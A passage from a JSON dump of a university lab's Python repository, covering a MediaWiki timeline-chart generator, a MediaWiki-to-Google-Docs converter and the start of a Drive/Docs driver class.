#fff;\n}\n\ntable {\n border: 1px solid #1C6EA4;\n font-size: 120%;\n background-color: #EEEEEE;\n width: 100%;\n text-align: left;\n border-collapse: collapse;\n}\ntable td, table th {\n border: 1px solid #AAAAAA;\n padding: 3px 2px;\n}\ntable tr:nth-child(even) {\n background: #D0E4F5;\n}\ntable thead {\n background: #1C6EA4;\n background: -moz-linear-gradient(top, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n background: -webkit-linear-gradient(top, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n background: linear-gradient(to bottom, #5592bb 0%, #327cad 66%, #1C6EA4 100%);\n border-bottom: 2px solid #444444;\n}\ntable thead th {\n font-weight: bold;\n color: #FFFFFF;\n border-left: 2px solid #D0E4F5;\n}\ntable thead th:first-child {\n border-left: none;\n}\n\n</style>\n<script type=\"text/javascript\" src=\"https://www.gstatic.com/charts/loader.js\"></script>\n</head>\n<body>\n\"\"\" + markup + \"</body></html>\"\n\ndef build_chart(category_name, chart_items, warnings, links=\"\"):\n normal_rows = []\n truncated_rows = []\n for item, dates in chart_items.items():\n bar_added = False\n if dates['Planning Start Date']:\n bar_added = True\n # Could be a project or a study\n if dates['Project Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Planning', dates['Planning Start Date'], dates['Project Start Date'])\n\n elif dates['Piloting Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Planning', dates['Planning Start Date'], dates['Piloting Start Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Planning with No Piloting Start', dates['Planning Start Date'], today + six_months)\n\n if dates['Project Start Date']:\n bar_added = True\n if dates['Project End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Project', dates['Project Start Date'], dates['Project End Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Project with No End Date', dates['Project Start Date'], today + six_months)\n\n if dates['Piloting Start Date']:\n bar_added = True\n if dates['Collecting Start Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting', dates['Piloting Start Date'], dates['Collecting Start Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting with No Collection Start', dates['Piloting Start Date'], today + six_months)\n\n if dates['Collecting Start Date']:\n bar_added = True\n if dates['Collecting End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Collecting', dates['Collecting Start Date'], dates['Collecting End Date'])\n elif dates['End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Collecting', dates['Collecting Start Date'], dates['End Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Piloting with No Collection Start', dates['Piloting Start Date'], today + six_months)\n\n if dates['Collecting End Date']:\n bar_added = True\n append_rows(normal_rows, truncated_rows, item,\n 'Wrapping Up', dates['Collecting End Date'], dates['End Date'])\n\n # Grants\n if dates['Letter of Intent Due']:\n bar_added = True\n if dates['Submission Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Writing', dates['Letter of Intent Due'], dates['Submission Date'])\n else:\n append_rows(normal_rows, truncated_rows, item,\n 'Grant with No Submission Date', dates['Letter of Intent Due'], dates['Letter of Intent Due'] + six_months)\n\n # Default to a boring \"Active\" bar if we added no specific dates\n if not bar_added and dates['Start Date'] and dates['End Date']:\n append_rows(normal_rows, truncated_rows, item,\n 'Active', dates['Start Date'], dates['End Date'])\n\n\n preamble = \"\"\"\n<h1>Near Future</h1>\n<div class=\"timeline-wrapper\">\n<div id=\"near-timeline\"></div>\n</div>\n\n<h1>Entire History</h1>\n<div class=\"timeline-wrapper\">\n<div id=\"study-timeline\"></div>\n</div>\n\n<h5>Date Parsing Warnings</h5>\n\"\"\" + \"<br/>\".join(warnings) + \"\"\"\n\n<script type=\"text/javascript\">\n google.charts.load(\"current\", {packages:[\"timeline\"]});\n google.charts.setOnLoadCallback(drawCharts);\n function drawChart(id, data, width) {\n var container = document.getElementById(id);\n var chart = new google.visualization.Timeline(container);\n var dataTable = new google.visualization.DataTable();\n dataTable.addColumn({ type: 'string', id: 'Role' });\n dataTable.addColumn({ type: 'string', id: 'Name' });\n dataTable.addColumn({ type: 'string', id: 'style', role: 'style' });\n dataTable.addColumn({ type: 'date', id: 'Start' });\n dataTable.addColumn({ type: 'date', id: 'End' });\n dataTable.addRows(data);\n // set a padding value to cover the height of title and axis values\n var paddingHeight = 50;\n // set the height to be covered by the rows\n var rowHeight = dataTable.getNumberOfRows() * 44;\n // set the total chart height\n var chartHeight = rowHeight + paddingHeight;\n\n chart.draw(dataTable, { width: width, height: chartHeight });\n }\n function drawCharts() {\n\"\"\"\n\n ending = \"\"\"\n drawChart('near-timeline', near, 2000);\n drawChart('study-timeline', all, 2000);\n }\n</script>\n\"\"\"\n\n data1 = \"var near = [{}];\".format(\",\\n\".join(truncated_rows))\n data2 = \"var all = [{}];\".format(\",\\n\".join(normal_rows))\n\n return make_html(f\"Chart for category {category_name}\", links + preamble + data1 + data2 + ending)\n\n\ndef build_table(category, chart_items, links=\"\"):\n content = [\n f\"<h1>Dates for category {category}</h1>\",\n \"<table><thead><tr>\"]\n def add_header(x):\n content.append(f\"<th>{x}</th>\")\n add_header(\"Name\")\n for x in TO_EXTRACT[category]:\n add_header(x)\n content.append(\"</tr></thead>\")\n\n for item, dates in chart_items.items():\n content.append(\"<tr>\")\n content.append(f\"<td><a href='{WIKI_URL}/{item}'>{item}</a></td>\")\n def add(x):\n if dates[x]:\n content.append(\"<td>✓</td>\")\n else:\n content.append(\"<td></td>\")\n for x in TO_EXTRACT[category]:\n add(x)\n content.append(\"</tr>\")\n\n content.append(\"</table>\")\n content.append(links)\n return make_html(f\"Dates for category {category}\", \"\\n\".join(content))\n\ndef fill_hash_dates(warnings, page, template, dates, key):\n if template.has(key):\n d = template.get(key).value.strip()\n if d == \"\":\n return\n try:\n if re.match(r'^\\D{3}', d) is not None:\n pattern = \"%B %d, %Y\"\n elif re.match(r'^\\d{4}', d) is not None:\n pattern = \"%Y/%m/%d\"\n else:\n pattern = \"%m/%d/%Y\"\n dates[key] = datetime.strptime(d, pattern)\n except ValueError:\n year = re.match('^[0-9]{4}', d)\n if year is not None:\n year = int(year.group(0))\n warning = \"Only found year {} for date {} on page {} from value '{}', guessing January 1\".format(year, key, page, d)\n warnings.append(warning)\n logging.warning(warning)\n dates[key] = datetime(year, 1, 1)\n else:\n warning = \"Could not get {} for page {} from template value '{}'\".format(key, page, d)\n warnings.append(warning)\n logging.warning(warning)\n\n\ndef run(mother):\n chart_data = {}\n chart_warnings = {}\n def extract(category_name, date_fields):\n logging.info(f\"Extracting {date_fields} from Category:{category_name}\")\n category = mother.categories[category_name]\n\n data = {}\n warnings = []\n for page in category:\n thing = page.name\n logging.debug(f\"Reading dates from page {thing}\")\n text = page.text()\n p = mwparserfromhell.parse(text)\n\n dates = data[thing] = defaultdict(lambda: False)\n\n for template in p.filter_templates():\n for field in date_fields:\n fill_hash_dates(warnings, thing, template, dates, field)\n return data, warnings\n\n for category_name, fields in TO_EXTRACT.items():\n chart_data[category_name], chart_warnings[category_name] = \\\n extract(category_name, fields)\n\n # Now we write the chart for each kind\n\n link_all_timelines = \"<h2><a href='index.html'>Back to all timelines</a></h2>\"\n for category_name, items in chart_data.items():\n with open(f\"/home/dfitch/pub_html/timeline/{category_name}.html\", \"w\") as output:\n chart_markup = build_chart(category_name, items, chart_warnings[category_name],\n link_all_timelines +\n f\"<h2><a href='{category_name}_dates.html'>View {category_name} date report</a></h2>\")\n output.write(chart_markup, )\n\n with open(f\"/home/dfitch/pub_html/timeline/{category_name}_dates.html\", \"w\") as output:\n markup = build_table(category_name, items,\n link_all_timelines +\n f\"<h2><a href='{category_name}.html'>View {category_name} timeline</a></h2>\")\n output.write(markup)\n\n # Join dictionaries\n all_items = {}\n all_items.update(chart_data['Grant'])\n all_items.update(chart_data['Project'])\n all_items.update(chart_data['Study'])\n\n # And finally the chart of everything joined together\n chart_markup = build_chart(\"All\", all_items, [],\n \"<h2><a href='Grant.html'>View only grants</a> | \" +\n \"<a href='Project.html'>View only projects</a> | \" +\n \"<a href='Study.html'>View only studies</a></h2>\" +\n f\"<h2><a href='{WIKI_URL}/Category:Grant'>Wiki grants listing</a> | \" +\n f\"<a href='{WIKI_URL}/Category:Project'>Wiki projects listing</a> | \" +\n f\"<a href='{WIKI_URL}/Category:Study'>Wiki studies listing</a></h2>\")\n with open(\"/home/dfitch/pub_html/timeline/index.html\", \"w\") as output:\n output.write(chart_markup)\n\n"
},
{
"alpha_fraction": 0.6439024209976196,
"alphanum_fraction": 0.6439024209976196,
"avg_line_length": 33,
"blob_id": "3959a7a3c47929b36fbd46053854e8e68e219ea9",
"content_id": "6a82b4848fdca0fa3ef32f3fd2794a4699b8f937",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/utilities.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "\ndef study_template(p):\n study_regex = r\"Study\"\n for template in p.filter_templates(matches=study_regex):\n if template.name.strip() == study_regex:\n return template\n return None\n"
},
{
"alpha_fraction": 0.4849896728992462,
"alphanum_fraction": 0.4878661334514618,
"avg_line_length": 34.10953140258789,
"blob_id": "3789265a9ca34f15148edf54377592aa4efadfa0",
"content_id": "5bf89b9f3a884bb1f8adc642cce0823d90754ee1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24683,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 703,
"path": "/gdocconverter.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwparserfromhell\nimport logging\nimport re\nimport time\nimport tempfile\nimport socket\nimport os\n\nfrom enum import Enum\n\nFONT_SIZE_DEFAULT = 11\nFONT_SIZE_TABLE = 8\n\nclass NodeResponseKind(Enum):\n NONE = 1\n BULLET = 2\n\nclass BulletKind(Enum):\n NORMAL = 1\n NUMERIC = 2\n\nclass NodeResponse:\n def __init__(self):\n self.kind = NodeResponseKind.NONE\n self.is_bold = False\n self.is_italic = False\n self.last_was_heading = False\n self.font_size = FONT_SIZE_DEFAULT\n\n def is_bullet(self):\n return self.kind == NodeResponseKind.BULLET\n\n def toggle_bold(self):\n self.is_bold = not self.is_bold\n return self\n\n def toggle_italic(self):\n self.is_italic = not self.is_italic\n return self\n\n def set_bullet(self, level):\n self.kind = NodeResponseKind.BULLET\n self.bullet_kind = BulletKind.NORMAL\n self.level = level\n return self\n\n def set_numeric_bullet(self, level):\n self.kind = NodeResponseKind.BULLET\n self.bullet_kind = BulletKind.NUMERIC\n self.level = level\n return self\n\n def bullet_complete(self):\n self.kind = NodeResponseKind.NONE\n return self\n\n def __str__(self):\n s = \"\"\n if self.is_bullet():\n return \"* \"\n else:\n return \"None\"\n\n\nGOOGLE_DOCS_PREFIX = \"https://docs.google.com/document/d/\"\nGOOGLE_DRIVE_PREFIX = \"https://drive.google.com/file/d/\"\n\n\nclass GDocConverter:\n \"\"\"\n Generic converter class, called by GDocExporter\n\n Uses most of the same APIs\n\n `file_prefix` is used to store image and other files in a \n public-internet-accessible location so the Google Docs API can read them \n from `http_prefix`\n \"\"\"\n\n def __init__(self, driver, wiki, wiki_prefix, docs, mappings, file_prefix, http_prefix):\n self.driver = driver\n self.wiki = wiki\n self.wiki_prefix = wiki_prefix\n self.docs = docs\n self.mappings = mappings\n self.file_prefix = file_prefix\n self.http_prefix = http_prefix\n\n\n def convert(self, page, doc_id, debug=False):\n \"\"\"\n Convert content from a given `page` into a google document at `doc_id`.\n\n Passing `debug=True` will run requests one at a time, so you can see \n the document getting created from the \"bottom up\" and debug API errors\n \"\"\"\n\n self.doc_id = doc_id\n\n # If we were really fancy, we would try to do merging of content.\n # But we're just going to brute force override old content.\n self.clear_document()\n\n # Note that the Google Docs API recommends that you \"create\n # backwards\" because of the indexes changing on edits.\n # So we insert everything at index 1 and then flip the order of operations\n requests = []\n\n requests += self.insert_heading_text(1, page.name + \"\\n\", level='TITLE') \n requests += self.insert_link(1, \"Original wiki location\\n\\n\", self.wiki_prefix + str(page.name)) \n\n oldtext = page.text()\n requests.extend(self.wiki_markup_to_requests(oldtext))\n\n requests = list(reversed(requests))\n flat_requests = []\n for x in requests:\n if isinstance(x, list):\n flat_requests.extend(x)\n else:\n flat_requests.append(x)\n\n self.driver.batch_update(self.doc_id, flat_requests, debug=debug)\n\n\n def wiki_markup_to_requests(self, markup, start_index=1, status=None):\n \"\"\"\n Turn Mediawiki markup into a series of Google Docs API requests.\n\n Note that it mutates requests in place because the `node_to_requests`\n function returns stateful NodeResponse. Better way would be to combine\n requests into that state object, but that's hard and confusing so\n I'm leaving this as is for now.\n\n `start_index` is usually 1, where we are inserting into the doc,\n because we're going in reverse. But sometimes inside tables we might\n need to insert at a different specific index.\n \"\"\"\n requests = []\n p = mwparserfromhell.parse(self.cleanup_markup(markup))\n nodes = list(p.nodes)\n if not status:\n status = NodeResponse()\n\n # Now just loop over the nodes, accumulating the last status\n for node in nodes:\n status = self.node_to_requests(node, requests, status, start_index=start_index)\n\n return requests\n\n\n def cleanup_markup(self, text):\n \"\"\"\n Initial pass to cleanup the mediawiki linefeeds and stuff that we don't\n want to even have in the parse.\n\n Mostly tries to remove extra line feeds in between text; mediawiki \n does not break there when displaying (impedance mismatch between docs \n and html whitespace)\n \"\"\"\n text = re.sub(r\"(\\w) *\\n *(\\w)\", r\"\\1 \\2\", text)\n # Cleaning up space around headings\n text = re.sub(\"=\\n{2,}\", \"=\\n\", text)\n text = re.sub(\"\\n{2,}=\", \"\\n=\", text)\n text = re.sub(\"\\n{2,}\", \"\\n\\n\", text)\n text = re.sub(\"__NOTOC__\\n*\", \"\", text)\n return text\n\n\n def node_to_text(self, node):\n \"\"\"\n Turn a mwparserfromhell node into plaintext.\n\n NOTE: Again, this makes us losing formatting inside (if there is any), \n and is probably doing the wrong thing for some kinds of content\n \"\"\"\n\n if node is None:\n return ''\n \n return str(node)\n\n\n def is_image(self, name):\n return name.endswith(\".jpg\") or name.endswith(\".png\") or name.endswith(\".gif\")\n\n\n def node_to_requests(self, node, requests, status, start_index=1):\n if isinstance(node, mwparserfromhell.nodes.comment.Comment):\n logging.debug(f\"Skipping comment: {str(node)}\")\n\n elif isinstance(node, mwparserfromhell.nodes.text.Text):\n text = self.node_to_text(node)\n\n if text == '' or not text:\n # Don't insert anything\n return status\n if status and status.is_bullet():\n # TODO: insert_bullet_text is way too happy at inserting bullets\n requests.append(self.insert_bullet_text(start_index, status, str(node)))\n # requests.append(self.insert_text(start_index, text, status))\n status = status.bullet_complete()\n else:\n requests.append(self.insert_text(start_index, text, status))\n\n elif isinstance(node, mwparserfromhell.nodes.heading.Heading): \n original_text = str(node)\n stripped = original_text.lstrip('=')\n level = \"HEADING_\" + str(len(original_text) - len(stripped))\n text = re.sub(\"(^=+|=+$)\", \"\", original_text, 2)\n text = re.sub(\"'{2,}\", \"\", text)\n text = text.strip()\n requests.append(self.insert_heading_text(start_index, text, level))\n\n elif isinstance(node, mwparserfromhell.nodes.wikilink.Wikilink):\n if node.title is None:\n raise \"Unclear what to do with a wikilink that has no title destination\"\n else:\n title = self.node_to_text(node.title)\n # Strip off front colon that makes it go straight to the file/category\n title = title.strip(\":\")\n\n doc_id = self.mappings.get_id_for_title(title)\n if doc_id:\n url = GOOGLE_DOCS_PREFIX + doc_id + \"/edit\"\n else:\n url = \"wiki://\" + title\n\n text = self.node_to_text(node.text).strip()\n if not text:\n text = title\n\n if \"File:\" in title or \"Media:\" in title:\n # Mediawiki lets you insert thumbnails of PDFs, let's not bother with that\n if \"thumb\" in text and self.is_image(title):\n thumb_params = text.split(\"|\")\n additional_text = \"\\n\"\n if len(thumb_params) > 0:\n # NOTE: This is probably not the right way to choose what part of the parameters are the caption\n caption = thumb_params[-1]\n if not caption == \"thumb\" and not \"px\" in caption:\n additional_text = \"\\n\" + caption\n\n image = self.wiki.pages[title]\n escaped_title = title.replace(\" \", \"_\")\n uri = self.http_prefix + \"/\" + escaped_title\n filename = self.file_prefix + \"/\" + escaped_title\n if 'baldi' in socket.gethostname():\n with open(filename, 'wb') as fd:\n image.download(fd)\n else:\n _, tempfilename = tempfile.mkstemp()\n with open(tempfilename, 'wb') as fd:\n image.download(fd)\n cmd = f\"chmod 664 '{tempfilename}'\"\n os.system(cmd)\n cmd = f\"scp '{tempfilename}' baldi:'{filename}'\"\n os.system(cmd)\n os.system(f\"rm {tempfilename}\")\n\n # TODO: Consider extracting width from thumb_params and passing along?\n logging.info(f\"Trying to insert image at url: {uri}\")\n # TODO: Disable when image truncation is \"solved\"\n # requests.append(self.insert_image(start_index, uri))\n requests.append(self.insert_text(start_index, \"IMAGE PENDING\"))\n\n requests.append(self.insert_text(start_index, additional_text))\n\n elif title in self.mappings.file_to_id:\n url = GOOGLE_DRIVE_PREFIX + self.mappings.file_to_id[title]\n requests.append(self.insert_link(start_index, text, url))\n\n else:\n # Insert link to file that we'll fix up in a second pass\n url = \"wiki://\" + title\n requests.append(self.insert_link(start_index, text, url))\n else:\n requests.append(self.insert_link(start_index, text, url))\n\n elif isinstance(node, mwparserfromhell.nodes.external_link.ExternalLink):\n text = self.node_to_text(node.title).strip()\n url = self.node_to_text(node.url)\n if text == \"\":\n text = url\n requests.append(self.insert_link(start_index, text, url))\n\n elif isinstance(node, mwparserfromhell.nodes.tag.Tag): \n if node.wiki_markup == '*':\n return status.set_bullet(level=1) \n elif node.wiki_markup == '**':\n return status.set_bullet(level=2) \n elif node.wiki_markup == '***':\n return status.set_bullet(level=3) \n elif node.wiki_markup == '****':\n return status.set_bullet(level=4) \n elif node.wiki_markup == '*****':\n return status.set_bullet(level=5) \n elif node.wiki_markup == '******':\n return status.set_bullet(level=6) \n elif node.wiki_markup == '#':\n return status.set_numeric_bullet(level=1) \n elif node.wiki_markup == '##':\n return status.set_numeric_bullet(level=2) \n elif node.wiki_markup == '###':\n return status.set_numeric_bullet(level=3) \n elif node.wiki_markup == '####':\n return status.set_numeric_bullet(level=4) \n elif node.wiki_markup == '#####':\n return status.set_numeric_bullet(level=5) \n elif node.wiki_markup == '######':\n return status.set_numeric_bullet(level=6) \n elif node.wiki_markup == '{|':\n requests.append(self.insert_table(start_index, node))\n elif node.wiki_markup is None:\n text = str(node)\n logging.info(f\"No markup in tag? Likely raw html: {text}\")\n # TODO: Clean up various kinds of html?\n # There's at least:\n # <nowiki /> (often used to escape bullets, can maybe just drop the tag?)\n # <gallery /> ex: CHM Communications and Branding Style Guide\n # <blockquote />\n # <u />\n # <pre />\n # <syntaxhighlight /> ex: FreeSurfer Setup\n # <code />\n # <sup />\n # <s />\n if text == \"<br>\":\n requests.append(self.insert_text(start_index, \"\\n\"))\n else:\n # TODO: better HTML stripping from a library would be smart\n text = re.sub('<[^<]+?>', '', text)\n requests.append(self.insert_text(start_index, text, status))\n\n elif \"''\" in str(node.wiki_markup):\n def toggle():\n if node.wiki_markup == \"'''''\":\n status.toggle_bold()\n status.toggle_italic()\n elif node.wiki_markup == \"'''\":\n status.toggle_bold()\n elif node.wiki_markup == \"''\":\n status.toggle_italic()\n\n clean = re.sub(\"'{2,}\", \"\", str(node))\n toggle()\n requests.append(self.insert_text(start_index, clean, status))\n toggle()\n\n elif \"---\" in str(node.wiki_markup):\n logging.info(f\"Skipping horizontal rule\")\n else:\n logging.warning(f\"Got unknown Tag node with markup {node.wiki_markup}, skipping\")\n\n elif isinstance(node, mwparserfromhell.nodes.html_entity.HTMLEntity): \n # Just output the Unicode version of whatever this is\n text = node.normalize()\n if text:\n requests.append(self.insert_text(start_index, text))\n\n elif isinstance(node, mwparserfromhell.nodes.template.Template): \n template_name = node.name.strip() \n requests.append(self.insert_text(start_index, f\"<template for {template_name} goes here>\"))\n logging.info(f\"Skipping template\")\n\n else:\n cls = str(node.__class__)\n logging.warning(f\"Got node with class {cls}, skipping\")\n\n return status\n\n\n def clear_document(self):\n idxend = self.get_last_index()\n if idxend <= 2:\n # Doc already empty\n return\n self.driver.batch_update(self.doc_id, [{\n 'deleteContentRange': {\n 'range': {\n 'startIndex': 1,\n 'endIndex': idxend-1,\n }\n }}])\n\n\n def insert_text(self, idx, text, status=None):\n \"\"\"\n Create text.\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n insert_text = {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n }\n\n is_bold = False\n is_italic = False\n if status:\n is_bold = status.is_bold\n is_italic = status.is_italic\n\n pt = FONT_SIZE_DEFAULT\n if status:\n pt = status.font_size\n\n update_text = {\n 'updateTextStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx + len(text)\n },\n 'textStyle': {\n 'bold': is_bold,\n 'italic': is_italic,\n 'fontSize': {\n 'magnitude': pt,\n 'unit': 'PT'\n },\n },\n 'fields': 'bold, italic, fontSize'\n }\n }\n\n return [[insert_text, update_text]]\n\n\n def insert_heading_text(self, idx, text, level='HEADING_1'):\n \"\"\"\n Create a heading in the document.\n\n Levels are here: https://developers.google.com/docs/api/reference/rest/v1/documents?hl=en#NamedStyleType\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n return [[{\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx + len(text)\n },\n 'paragraphStyle': {\n 'namedStyleType': level,\n },\n 'fields': 'namedStyleType'\n }\n },\n # This is real dumb, but if we don't insert a paragraph and force \n # it to NORMAL, the stuff preceding this header in the document \n # will get header-tized when the requests are all reversed and \n # batched up. It leads to a really dumb extra blank paragraph that \n # gets the formatting, but I can't find a good way around that\n {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': \"\\n\"\n }\n },\n {\n 'updateParagraphStyle': {\n 'range': {\n 'startIndex': idx,\n 'endIndex': idx\n },\n 'paragraphStyle': {\n 'namedStyleType': 'NORMAL_TEXT',\n },\n 'fields': 'namedStyleType'\n }\n },\n ]]\n\n\n def insert_bullet_text(self, idx, status, text):\n \"\"\"\n Create bullets in the document.\n\n I couldn't figure out how to do this without completely\n bulletting everything in the doc, so I stole the idea from\n https://stackoverflow.com/questions/65330602/how-do-i-indent-a-bulleted-list-with-the-google-docs-api\n to do a really dumb set of insertions and deletions\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n if status.bullet_kind == BulletKind.NUMERIC:\n bullet_preset = 'NUMBERED_DECIMAL_ALPHA_ROMAN_PARENS'\n else:\n bullet_preset = 'BULLET_DISC_CIRCLE_SQUARE'\n\n bullet_text = (\"\\t\" * (status.level - 1)) + text\n\n return [[\n { 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': f\"\\n\"\n }},\n { 'createParagraphBullets': {\n 'range': {\n 'startIndex': idx+1,\n 'endIndex': idx+1\n },\n 'bulletPreset': bullet_preset,\n }},\n { 'insertText': {\n 'location': {\n 'index': idx+1,\n },\n 'text': bullet_text\n }},\n { 'deleteContentRange': {\n 'range': {\n 'startIndex': idx + len(bullet_text),\n 'endIndex': idx + len(bullet_text) + 1\n },\n }},\n ]]\n\n\n def insert_image(self, idx, uri):\n \"\"\"\n Insert image accessible at the given URI.\n \"\"\"\n\n return [[\n {\n 'insertInlineImage': {\n 'location': {\n 'index': idx,\n },\n 'uri': uri,\n 'objectSize': {\n 'width': {\n 'magnitude': 200,\n 'unit': 'PT'\n }\n }\n }\n }\n ]]\n\n\n def insert_link(self, idx, text, url):\n \"\"\"\n Insert hyperlink with given text and URL.\n \"\"\"\n\n if text == \"\" or not text:\n return []\n\n return [[\n {\n 'insertText': {\n 'location': {\n 'index': idx,\n },\n 'text': text\n }\n },\n {\n \"updateTextStyle\": {\n \"textStyle\": {\n \"link\": {\n \"url\": url\n }\n },\n \"range\": {\n \"startIndex\": idx,\n \"endIndex\": idx + len(text)\n },\n \"fields\": \"link\"\n }\n }\n ]]\n\n\n def insert_table(self, idx, markup):\n \"\"\"\n Create table, given the raw mediawiki markup\n \"\"\"\n\n rows = markup.contents.split(\"|-\")\n # Not sure how header exclamations in wikitable markup are escaped?\n # Here we're just going to eat whether a row is a header and not try\n # to format it at all\n rows[0] = rows[0].replace(\"!\", \"|\")\n # NOTE: Naive split on \"|\" breaks on tables with links that use |,\n # so the ^|\\n here is a bad hack to get by those\n split_rows = [re.split(r\"(?:^|\\n)\\|\", r)[1:] for r in rows]\n max_columns = max([len(r) for r in split_rows])\n if max_columns == 0:\n logging.warning(f\"Hit table with no columns? Skipping\")\n return self.insert_text(idx, \"[Table failed to convert]\")\n\n def table_index_of_cell(i, j):\n # Complicated math to find index location of a given cell \n # in the crazy google docs json tree counting system, yuck\n return (3 + i + max_columns * i * 2) + (j + 1) * 2\n\n # For some reason we have to tweak this, you would think it would be \n # just the same as the table index of the last cell, but it's not\n end_of_font_range = table_index_of_cell(len(split_rows), max_columns) - max_columns * 2\n\n requests = [\n { 'insertTable': {\n 'location': { 'index': idx, },\n 'rows': len(rows),\n 'columns': max_columns }},\n { 'updateTextStyle': {\n 'range': {\n 'startIndex': 1,\n 'endIndex': end_of_font_range\n },\n 'textStyle': {\n 'fontSize': {\n 'magnitude': FONT_SIZE_TABLE,\n 'unit': 'PT'\n },\n },\n 'fields': 'fontSize'\n }}\n ]\n\n all_cell_requests = []\n\n for i, row in enumerate(split_rows):\n for j, cell in enumerate(row):\n text = cell.strip()\n if text:\n index = table_index_of_cell(i, j)\n\n # Now we parse the cell's content and convert that, too, \n # because it could have links and what not\n table_status = NodeResponse()\n table_status.font_size = 9\n cell = self.wiki_markup_to_requests(text, index, status=table_status)\n all_cell_requests.extend(cell)\n\n # TODO: Links not getting output here???\n\n requests.extend(reversed(all_cell_requests))\n\n # Remember, we have to wrap the list of actions in another list\n # so it doesn't get reversed, we've already set it up to happen\n # exactly in the order we want\n return [requests]\n\n\n def get_content(self):\n return self.driver.get_document(self.doc_id).get('body').get('content')\n\n\n def get_last_index(self):\n content = self.get_content()\n last = content[-1]\n return last['endIndex']\n\n\n def get_text_range(self, match_text):\n \"\"\"\n Find `match_text` and return its start and end index.\n \"\"\"\n\n data = self.get_content()\n\n for d in data:\n para = d.get('paragraph')\n if para is None:\n continue\n else:\n elements = para.get('elements')\n for e in elements:\n if e.get('textRun'):\n content = e.get('textRun').get('content')\n if match_text in content:\n # Do we want to adjust to WHERE in content, or just return the whole run?\n idx = e.get('startIndex')\n inxend = e.get('endIndex')\n return idx, endIdx\n\n return None, None\n\n"
},
{
"alpha_fraction": 0.5771434903144836,
"alphanum_fraction": 0.5787166953086853,
"avg_line_length": 36.156578063964844,
"blob_id": "33501bcd8c402e86513295429d3715ecfb4f9019",
"content_id": "ce25e8a73f1fc5720f40f6c03b483552debe0d33",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17798,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 479,
"path": "/gdocdriver.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwparserfromhell\nimport logging\nimport requests\nimport os\nimport time\nimport pytz\nfrom datetime import datetime\nfrom dateutil import parser\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\n\nfrom gdocmappings import GDocMappings \nfrom gdocconverter import GDocConverter\nfrom gdoclinks import GDocLinks\n\nSCOPES = ['https://www.googleapis.com/auth/documents',\n 'https://www.googleapis.com/auth/drive',\n 'https://www.googleapis.com/auth/drive.file',\n 'https://www.googleapis.com/auth/drive.metadata']\nMAPPINGS_FILE = \"mappings.google.json\"\n\n# Limit to how many parents to request via Drive API\nMAX_PARENTS = 500\n\nclass GDocDriver:\n \"\"\"\n Class that controls a connection to the Drive and Docs APIs\n and knows how to run conversions from MediaWiki into Docs files.\n\n Also beginning to add \"walking\" functionality to run arbitrary\n updates on docs in a given folder\n \"\"\"\n\n def __init__(self, mappings_path, drive_id):\n \"\"\"\n GDocDriver needs a path to mappings. See `gdocmappings.py`.\n\n Google services auth is OAuth, so it will try to start $BROWSER\n if there is no cached token.\n\n `file_prefix` is used by the converter to store image and other\n files in a public-internet-accessible location so the Google Docs\n API can read them from `http_prefix`\n \"\"\"\n\n self.mappings = GDocMappings(MAPPINGS_FILE)\n self.initialize_google_services()\n self.drive_id = drive_id\n self.folders = {}\n\n\n def run_export(self, wiki, wiki_prefix, force, older, file_prefix, http_prefix, unsorted_folder_id, page_title):\n \"\"\"\n Function that does the conversion from mediawiki to gdoc,\n walking the mediawiki pages\n \"\"\"\n\n self.wiki = wiki\n self.wiki_prefix = wiki_prefix\n self.file_prefix = file_prefix\n self.http_prefix = http_prefix\n self.unsorted_folder_id = unsorted_folder_id\n\n if page_title:\n # We don't need to load common folders if the doc already exists\n if not page_title in self.mappings.title_to_id:\n self.load_common_folders()\n self.convert_one(page_title)\n else:\n self.load_common_folders()\n if force:\n self.convert_all()\n if older:\n self.convert_all(older_than=older)\n else:\n self.convert_all_new()\n\n self.mappings.save()\n\n\n def run_check_links(self, wiki, file_prefix, files_folder_id, folder_id):\n docs = self.recursive_docs_in_folder(folder_id)\n\n for doc_id in docs.keys():\n linker = GDocLinks(wiki, self, file_prefix, files_folder_id)\n linker.check_links(doc_id)\n\n\n def recursive_docs_in_folder(self, folder_id):\n relevant_folders = [folder_id]\n for folder in self.folders_in_folder(folder_id):\n relevant_folders.append(folder)\n return self.get_relevant_files(relevant_folders)\n\n\n def get_relevant_files(self, relevant_folders):\n \"\"\"\n Get files under the relevant_folders and all their subfolders.\n \"\"\"\n relevant_files = {}\n 